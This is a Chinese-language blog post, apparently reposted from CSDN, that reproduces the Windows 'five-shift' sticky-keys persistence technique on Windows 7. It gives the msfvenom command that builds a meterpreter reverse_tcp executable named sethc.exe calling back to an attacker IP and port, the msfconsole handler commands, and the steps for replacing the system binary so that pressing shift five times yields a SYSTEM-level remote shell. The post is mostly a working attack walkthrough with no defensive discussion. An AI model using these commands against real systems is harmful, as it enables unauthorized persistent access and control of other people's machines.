Windows系统利用5次shift维权漏洞复现

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

操作系统: Windows 7 旗舰版

工具: kali系统的msfconsole

5次shift维权原理

Windows系统中,5次shift键可以触发粘滞键,也就是C:WindowsSystem32sethc.exe,我们将cmd.exe改成sethc.exe并替换掉原来的粘滞键,就可以在登录界面通过5次shift键执行cmd,并且是system权限

除此以外,还可以使用其他工具替换sethc.exe

第一步,使用kali的msfconsole生成木马工具

1.开启MSF

msfconsole

 2.使用开发模块

use exploit/multi/handler

 3.生成木马,lhost写自己的ip,lport写自己的端口,作用是反弹shell到指定ip的端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.128 lport=4444 -f exe -o sethc.exe

4.因为我是在桌面打开的终端,生成的木马文件会在用户的根目录下,打开另一个终端查看文件位置

img

 

第二步,监听端口,接收反弹的shell

1.生成payload

set payload windows/meterpreter/reverse_tcp

2.设置反弹shell的位置( 自己的ip )

set lhost 192.168.18.128

3.设置反弹的端口

set lport 4444

4.开启监听

exploit

img

 

第三步,替换sethc.exe

将生成的木马工具上传到目标主机的c:/windows/system32目录下,并替换原有的sethc.exe

源sethc.exe不能直接修改或删除,需要修改权限

img

 

第四步,5次shift触发sethc.exe并反弹shell

1.在目标主机按5次shift触发sethc.exe,没有任何反应,因为程序被替换了

2.查看kali的监听状态,输入 shell 可进入目标主机的命令行,并执行系统命令

img

 

 

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/119118227
-- 展开阅读全文 --
Redis底层数据结构--跳跃表
« 上一篇 04-28
BUUCTF Web [强网杯 2019]随便注
下一篇 » 06-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复